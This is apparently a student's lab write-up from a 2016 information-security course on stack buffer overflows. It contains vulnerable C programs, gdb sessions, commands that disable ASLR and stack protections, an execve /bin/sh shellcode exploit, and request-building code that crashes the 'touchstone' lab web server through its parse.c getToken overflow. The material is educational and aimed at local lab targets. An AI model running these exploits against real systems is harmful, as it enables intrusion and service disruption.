信息安全实验一：buffer-overflow

title: buffer-overflow

date: 2016-01-10 14:17:17

categories: information-security

tags: buffer-overflow

• Excrcise1
  
  Now, you can write some code. Your job is to print the address of the variable buffer,
  
  in the C program stack1.c, and compile the C program as above.Run it three times,
  
  observe and write down the output addresses in address.txt, are these 3 addresses the same or not?
  • 打印首地址 运行3次 每次地址不同

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    void badman()
    {
    	printf("I am the bad man\n");
    	return;
    }
    int func(char *str)
    {
      int variable_a;
      char buffer[12];
      printf("address:%p\n",buffer);
      strcpy(buffer, str);
     return 1;
    }
    int main(int argc, char **argv)
      {
      char *buf = "hello\n";
      if(argc > 1){
    	buf = argv[1];
      }
      func(buf);
      printf("Returned Properly\n");
      return 1;
    }
  

---

• Excrcise2
  
  Use gdb to debug the program, as the following. You may find the online gdb documentation useful.
  • GDB常见命令

  打开gdb 调试工具：gdb -q
  （gdb）file stack1 启动待调试程序
  （gdb）b func 在函数func 处设置断点
  （gdb）r 运行程序
  （gdb）i r 查看所有寄存器的值
  （gdb）x/2s 0xbffff3a0 地址0xbffff3a0 开始读取2 个单元字符串内容
  （默认4 字节，以下相同）
  （gdb）p &buffer 打印变量buffer[]首地址
  （gdb）x/4wx 0xbffff3a0 地址0xbffff3a0 开始读取4 个单元、以4 字
  节为单位、以16 进制显示内容
  （gdb）x/8wx $ebp 寄存器ebp 开始读取8 个单元、以4 字节为单位、
  以16 进制显示内容
  （gdb）x/2i 0x08048443 查看地址0x08048443 开始2 个单元指令
  （gdb）disass func 查看函数func 的汇编代码
  （gdb）q 退出
  

  • 使用GDB调试示例：

  $ gdb stack1
  (gdb) b  func
  Breakpoint 1 at 0x8048412: file stack.c, line 8.
  (gdb) r
  Starting program: /tmp/stack1
  8      strcpy(buffer,str);
  (gdb) info r
  eax            0x80484e8    134513896
  ecx            0xbffff504    -1073744636
  edx            0xbffff494    -1073744748
  ebx            0xb7fc8000    -1208188928
  esp            0xbffff410    0xbffff410
  ebp            0xbffff438    0xbffff438
  esi            0x0    0
  edi            0x0    0
  eip            0x8048412    0x8048412
  eflags         0x282    [ SF IF ]
  cs             0x73    115
  ss             0x7b    123
  ds             0x7b    123
  es             0x7b    123
  fs             0x0    0
  gs             0x33    51
  (gdb) x/2s 0x80484e8
  0x80484e8:     "I am greater than 12 bytes"
  0x8048503:     ""
  (gdb) p &buffer
  $1 = (char (*)[12]) 0xbffff424
  (gdb) x/4wx 0xbffff424
  0xbffff424:    0x08048320    0x00000000    0x080482bd    0xb7fc83e4
  (gdb) x/8wx $ebp
  0xbffff438:    0xbffff468    0x08048443    0x080484e8    0xbffff504
  0xbffff448:    0xbffff50c    0xb7e54225    0xb7fed280    0x00000000
  (gdb) x/2i 0x08048443
  0x8048443 :    leave
  0x8048444 :    ret
  (gdb) disass func
  Dump of assembler code for function func:
  0x0804840c :    push   %ebp
  0x0804840d :    mov    %esp,%ebp
  0x0804840f :    sub    $0x28,%esp
  0x08048412 :    mov    0x8(%ebp),%eax
  0x08048415 :    mov    %eax,0x4(%esp)
  

---

• Exercise3
  
  Turn off the address space layout randomization, and then do exercise 1 again,
  
  write down the three addresses in args.txt, are those three addresses same or not?
  • 关闭地址随机化 多次打印变量缓冲区地址相同

    sysctl -w kernel.randomize_va_space=0
  

---

• Exercise4
  
  A buffer overflow occurs when data written to a buffer exceeds the length of the buffer,
  
  so that corrupting data values in memory addresses adjacent the end of the buffer.
  
  This often occurs when copying data into a buffer without sufficient bounds checking.
  
  You can refer to Aleph One’s famous article to figure out how buffer overflows work.
  • Now, you run the program stack1, just like below.

    $ ./stack1 aaaaaaaaaa
    Returned Properly
    $ ./stack1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    Segmentation fault
  

  If you don’t observe Segmentation fault, just increase the number of the input as.
  
  Here, the message Segmentation fault indicates that your program crashed due to invalid memory access
  
  (for instance, refer to memory address 0).

---

• Exercise4
  
  Use gdb, to print the value of the register %eip when the program crashes.
  • How does the program run to this address?

  程序执行时传入参数aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  得出程序崩溃时%eip 的值为0x61
  由于传入的参数长度超过了buffer 缓冲区的大小，在进行字符
  串复制的时候，buffer[]不足以容纳传入的字符串aaaaaaaaaaaaaaaaaaa，
  导致了缓冲区溢出。
  

---

• Exercise5
  
  The -z execstack option will mark the stack segment executable,
  
  which you’ll study in detail in lab 2.
  • May you have seen there is a function name badman in the stack1.c,
    
    but we never use it. Now let’s do a exercise, we’ll invoke it manually.

    $ make stack1
    $ gdb stack1 -q
    (gdb) b func
    Breakpoint 1 at 0x804844a: file stack1.c, line 20.
    (gdb) r
    Breakpoint 1, func (str=0x8048551 "hello\n") at stack1.c:20
    20      strcpy(buffer, str);
    (gdb) p badman
    $1 = {void ()} 0x804842b <badman>
    (gdb) i r $ebp
    ebp            0xffffd828    0xffffd828
    (gdb) x/wx $ebp+4
    0xffffd82c:    0x08048496
    (gdb) bt
    #0  func (str=0x8048551 "hello\n") at stack1.c:20
    #1  0x08048496 in main (argc=1, argv=0xffffd904) at stack1.c:33
    (gdb) set *0xffffd82c=0x0804842b
    (gdb) c
    Continuing.
    I am the bad man
  
    Program received signal SIGSEGV, Segmentation fault.
    0x08048556 in ?? ()
    (gdb)
  

  • What is stored in the address 0xFFFFd82c ?

    存放的是ret 也就是函数func()返回地址
    

  • Why after change its value to 0x0804842B, the function banman get invoked ?

    0x0804842b是badman()地址
    0xffffd82c是func()ret的地址
    set *0xffffd82c=0x0804842b 强制使func返回的时候进入badman()函数
    所以导致了函数badman()被调用了
    

  • Why the Program result s SegmentFault?

    提示信息：Program received signal SIGSEGV, Segmentation fault.
    说明了程序执行了无效的内存引用。因为在正常的代码中，没有地方
    调用函数badman()，所以执行完函数badman()返回时会发生错误。
    

  • IF we don't want to get a SegmentFault, what we should do ?

    不出现Segmentation fault 的思路是：保存*(ebp+4)，进入函数badman()
    之后，用保存的*(ebp+4)覆盖此刻的*(ebp+4)的值，这样程序就能顺利进入到main()函数。
    

---

• Exercise6
  • The shellcode we offered can pop up a shell, Now it’s your turn to attack the C program named stack.c
    
    using shellcode, you will get a shell if you succeed. You should compile and run your program as follows:

    $ make stack2
    $ ./stack2
    sh-3.2$ id
    uid=1000(seed) gid=1000(seed) groups=4(adm),20(dialout),24(cdrom),
    46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(seed)
    sh-3.2$ exit
  

  Here, the -fno-stack-protector option will disable gcc’s stack canary.
  
  Hint: you can use the gdb when necessary, but keep in mind that there are some minor differences between the result from gdb
  
  and that from the stand-alone executable.

  • 关闭linux内核内存地址随机化

    sysctl –w kernel.randomize_va_space=0
  

  • 关闭gcc编译器金丝雀

    -fno-stack-protector
  

  • 关闭堆栈段不可执行

    -z execstack
  

  • You may look up the Intel Manual to know why the shellcode works.

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    char shellcode[]=
      "\x31\xc0"
      "\x50"
      "\x68""//sh"
      "\x68""/bin"
      "\x89\xe3"
      "\x50"
      "\x53"
      "\x89\xe1"
      "\x99"
      "\xb0\x0b"
      "\xcd\x80" ;
    // size = 24
    int func(char *str)
    {
      char buffer[128];
      int i;
      int* ptr=(int*)str;
      for(i=6;i<40;i++)//the size of shell code 24 bytes
    	*(ptr+i)=(int)buffer;//buffer首地址覆盖func()返回值
      strcpy(buffer, str);
      return 1;
    }
    int main(int argc, char**argv)
    {
      char buffer[1024];
      int i;
      for(i=0;i<strlen(shellcode);i++)
    	buffer[i]=shellcode[i];
      func(buffer);
      printf("Returned Properly\n");
      return 1;
    }
  

---

• Exercise7
  
  All the source code for touchstone is stored in the code repository.
  • Now compile the touchstone web server and deploy it:

    $ make
    $ ./touchstone
  

• Open your browser to input this URL http://127.0.0.1:8080,
  
  you will get a simple “hello, world” page.
  
  Study the web server's code, and look for code vulnerability which can be exploited to crash
  
  the server by buffer overflows, pay special attention to the file parse.c.
  
  Write down a description of each vulnerability in the file named bugs.txt.
  • Note:
    
    For each vulnerability, how you would construct the input (i.e., the HTTP request) to overflow the buffer,
    
    Locate at least one vulnerabilities. Here is a tutorial of the HTTP protocol,
    
    you can focus on the GET request.
  • parse.c

    getToken 函数对' '和'\r\n'以外字符直接进行存储，并且都不经过数组边界检查，所以s数
    组是很容易溢出的，而且当遇到'\r'时，如果后面没有'\n'，输入的字符也会被一概存入s；
  
    s 数组溢出之后不仅可以修改return address 从而改变程序执行流，而且可以修改参数fd，
    比如我们可以将其改为0，那么当getToken 再调用getChar 时，read 函数会去标准输入
    读取字符，这样就可以使服务器端程序停住，而客户端浏览器处于”死等“状态。
  

---

• Excrcise8

  • Even though the vulnerability has been detected in the web server, it’s still difficult for you to crash the server,
    
    because your browser will do most of the dirty work for you that you can not control, that is,
    
    you can only do good things with such a browser. So, as a hacker, you have to write your own browser from scratch.

  • We have offered you a simple browser in the file browser.c, basically,
    
    this browser will construct an http request and then send to the web server, waiting for the server’s response.

  • construct an input to send to the touchstone web server

      For the buffer overflow vulnerability you've found,
      construct an input to send to the touchstone web server,
      your goal is to crash the web server (the http server daemon).
      Note: if you're successful to crash the web server,
      your browser will remain dead-waiting to receive data from the server.
      Don't forget that any valid request must end up with \r\n\r\n.
  

  • browser.c

    对于以上找到的漏洞，在browser.c 中添加请求字符串，达到crash sever 的目的，
    效果是客户端一直处于等待response 的状态。
    攻击的关键在于找到返回地址所在的地址，我们可以用gdb 调试的方法找到这个地址，
    也可以在parse.c 中输出s 和fd 的地址，
    那么ret 就在&fd 这个地址，这里之所以还要找到s 的地址是因为，返回地址的下一个字存放的是fd，
    我们如果改变了fd，那么调用getChar 时，read 函数不再是去客户端socket 读取值，
    而是根据文件描述符fd 去其它文件读了。
  
    编写一个无限循环的shellcode，如
    while(1);
    编译后用objdump 可以查看其机器码，我们可以看到是eb fe,
    我们将NOP,shellcode，addr分别填入大小为&fd-s 的数组，
    还有一个关键处是我们还要在数组最后加一个' ',这是getToken 函数的出口之一，另一个是'\r\n'.
    将shellcode 代码存入缓冲区，在最后一个字节填入' ',具体的代码如下：
    	char req[1065];
    	int i;
    	for(i=0;i<1064;++i)
    	req[i] = 0;
    	for(i=0;i<strlen(shellcode);++i)
    	req[i] = shellcode[i];
    	*((int*)(req+1060)) = 0xbffff9e8;//该地址为getToken 的s 数组地址
    	req[1064] = ' ';
    	write(sock_client,req,1065);
    根据找到的另一漏洞，我们可以不用shellcode，达到同样的效果，就是将fd 的内容改为0，
    让read 函数等待标准输入，代码如下：
    	char req[1069];
    	int i;
    	for(i=0;i<1068;++i)
    	req[i] = 0;
    	req[1068] = ' ';
    	write(sock_client,req,1069);
  

---

• Excrcise9
  
  Crashing the web server is just the first step, now you should try to do some thing interesting,
  
  say, to delete some sensitive files (for example, the grades.txt). To start with,
  
  you can use the program create-shellcode.c,
  
  to construct your shellcode, you may have to modify the file according to your need.
  
  And you can copy your shellcode to the C program test-shell.c.
  • delete grades.txt

    Perform your attack by constructing an exploit that hijacks control flow of the web server
    and unlink (delete) grades.txt.
    Remember that the web server is on your computer,
    so you should create a file named grades.txt first.